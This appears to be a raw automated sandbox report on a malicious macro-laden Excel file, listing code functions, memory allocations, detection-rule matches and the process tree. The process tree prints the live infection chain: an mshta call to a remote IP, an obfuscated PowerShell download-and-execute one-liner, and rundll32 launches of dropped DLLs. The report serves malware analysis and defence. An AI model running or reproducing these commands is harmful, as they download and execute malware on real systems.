                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0018901112_2_00189011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00183C3C12_2_00183C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019044F12_2_0019044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001920BA12_2_001920BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0018D6D812_2_0018D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0018F8FD12_2_0018F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019411612_2_00194116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019473C12_2_0019473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0018AB8712_2_0018AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001A13AD12_2_001A13AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001995FA12_2_001995FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00187FF212_2_00187FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001859F212_2_001859F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0018481612_2_00184816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001A0C1412_2_001A0C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019000112_2_00190001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019860612_2_00198606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001A0E3A12_2_001A0E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019AC3A12_2_0019AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00183E3F12_2_00183E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019C63112_2_0019C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019AA3012_2_0019AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019F43512_2_0019F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00187C3712_2_00187C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019BE2712_2_0019BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00184C5D12_2_00184C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0018205112_2_00182051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0018225112_2_00182251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00190E5312_2_00190E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001A005612_2_001A0056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00181A5612_2_00181A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00196C4912_2_00196C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019907F12_2_0019907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019AE6D12_2_0019AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00185E6012_2_00185E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019A66612_2_0019A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0018EA9912_2_0018EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0018F09B12_2_0018F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019188912_2_00191889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0018EE8112_2_0018EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001870B312_2_001870B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019DEDC12_2_0019DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001966CA12_2_001966CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0018E2CC12_2_0018E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00195CC412_2_00195CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0018B2C712_2_0018B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0018AEFB12_2_0018AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019DCF712_2_0019DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019A2E812_2_0019A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00199EEC12_2_00199EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001864E212_2_001864E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00184EE312_2_00184EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019851912_2_00198519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00190B1912_2_00190B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0018971412_2_00189714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00188B3D12_2_00188B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001A0F3312_2_001A0F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0018773512_2_00187735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019BB2312_2_0019BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00186D2412_2_00186D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019CB5B12_2_0019CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0018A55F12_2_0018A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019255012_2_00192550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0018554812_2_00185548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019894B12_2_0019894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0018B74D12_2_0018B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0018434612_2_00184346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0018CF4712_2_0018CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0018BB7E12_2_0018BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0018896912_2_00188969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019176B12_2_0019176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0018536112_2_00185361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0018E99112_2_0018E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019E39512_2_0019E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019D38912_2_0019D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00189B8312_2_00189B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00194B8712_2_00194B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001851BB12_2_001851BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001A09B512_2_001A09B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001881B712_2_001881B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019C3A012_2_0019C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00197BA612_2_00197BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00182BD912_2_00182BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00197DD512_2_00197DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00199BCF12_2_00199BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00189DCF12_2_00189DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0018E5CF12_2_0018E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00196DF812_2_00196DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0018DFF312_2_0018DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0019DBEA12_2_0019DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00198BE312_2_00198BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025F8FD14_2_0025F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025AB8714_2_0025AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025E99114_2_0025E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026BE2714_2_0026BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00257C3714_2_00257C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026F43514_2_0026F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026AA3014_2_0026AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026C63114_2_0026C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00253C3C14_2_00253C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00253E3F14_2_00253E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026AC3A14_2_0026AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00270E3A14_2_00270E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026860614_2_00268606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026000114_2_00260001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00270C1414_2_00270C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025481614_2_00254816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025901114_2_00259011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026A66614_2_0026A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00255E6014_2_00255E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026AE6D14_2_0026AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026907F14_2_0026907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026044F14_2_0026044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00266C4914_2_00266C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0027005614_2_00270056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00251A5614_2_00251A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025205114_2_00252051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025225114_2_00252251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00260E5314_2_00260E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00254C5D14_2_00254C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002570B314_2_002570B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002620BA14_2_002620BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025EE8114_2_0025EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026188914_2_00261889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025EA9914_2_0025EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025F09B14_2_0025F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00254EE314_2_00254EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002564E214_2_002564E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00269EEC14_2_00269EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026A2E814_2_0026A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026DCF714_2_0026DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025AEFB14_2_0025AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025B2C714_2_0025B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00265CC414_2_00265CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025E2CC14_2_0025E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002666CA14_2_002666CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026DEDC14_2_0026DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025D6D814_2_0025D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00256D2414_2_00256D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026BB2314_2_0026BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025773514_2_00257735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00270F3314_2_00270F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00258B3D14_2_00258B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026473C14_2_0026473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026411614_2_00264116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025971414_2_00259714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026851914_2_00268519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00260B1914_2_00260B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025536114_2_00255361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025896914_2_00258969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026176B14_2_0026176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025BB7E14_2_0025BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025CF4714_2_0025CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025434614_2_00254346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025B74D14_2_0025B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025554814_2_00255548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026894B14_2_0026894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026255014_2_00262550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025A55F14_2_0025A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026CB5B14_2_0026CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00267BA614_2_00267BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026C3A014_2_0026C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002713AD14_2_002713AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002709B514_2_002709B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002581B714_2_002581B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002551BB14_2_002551BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00264B8714_2_00264B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00259B8314_2_00259B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026D38914_2_0026D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026E39514_2_0026E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00268BE314_2_00268BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0026DBEA14_2_0026DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025DFF314_2_0025DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00257FF214_2_00257FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002559F214_2_002559F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002695FA14_2_002695FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00266DF814_2_00266DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00269BCF14_2_00269BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00259DCF14_2_00259DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0025E5CF14_2_0025E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00267DD514_2_00267DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00252BD914_2_00252BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00223C3C15_2_00223C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0022901115_2_00229011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0023044F15_2_0023044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_002320BA15_2_002320BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0022F8FD15_2_0022F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0022D6D815_2_0022D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0023473C15_2_0023473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0023411615_2_00234116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_002413AD15_2_002413AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0022AB8715_2_0022AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00227FF215_2_00227FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_002259F215_2_002259F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_002395FA15_2_002395FA
                            Source: 32E3.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                            Source: 2022-28-01_1202.xlsMacro extractor: Sheet name: REEEEEEEE
                            Source: 2022-28-01_1202.xlsMacro extractor: Sheet name: REEEEEEEE
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                            Source: Joe Sandbox ViewDropped File: C:\ProgramData\JooSee.dll 21C51D21F3133DF7A51F34255F0E545390A863D5D5C48FB657EAAD3EF72BF253
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0018E249 DeleteService,12_2_0018E249
                            Source: 2022-28-01_1202.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Users\user\Desktop\2022-28-01_1202.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Vkgzbyhfrraf\Jump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10032B38 appears 108 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100201F1 appears 34 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100200FD appears 72 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D27 appears 288 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1001F9FC appears 52 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D5A appears 82 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100359C1 appears 46 times
                            Source: 2022-28-01_1202.xlsOLE indicator, VBA macros: true
                            Source: 2022-28-01_1202.xls.0.drOLE indicator, VBA macros: true
                            Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@25/9@2/48
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                            Source: 2022-28-01_1202.xlsOLE indicator, Workbook stream: true
                            Source: 2022-28-01_1202.xls.0.drOLE indicator, Workbook stream: true
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc,9_2_100125C0
                            Source: 2022-28-01_1202.xlsReversingLabs: Detection: 11%
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................P...............................P.......................`I.........v.....................K......h.^.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................DX.k....................................}..v............0...............................................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................DX.k..... ..............................}..v............0...............h.^.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................$X.k....................................}..v............0...............................................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................$X.k....H.^.............................}..v....h.......0.................^.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............tY.k....................................}..v............0...............................................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............tY.k......^.............................}..v............0...............x.^.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'................A.k....E...............................}..v............0...............H.^.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+................A.k....E...............................}..v....@.......0...............H.^.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0...............X.......:.......................Jump to behavior
                            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",ZIMElQfgS
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",zrvqzkK
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",vtyiOTNVC
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",DllRegisterServer
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.htmlJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.htmlJump to behavior
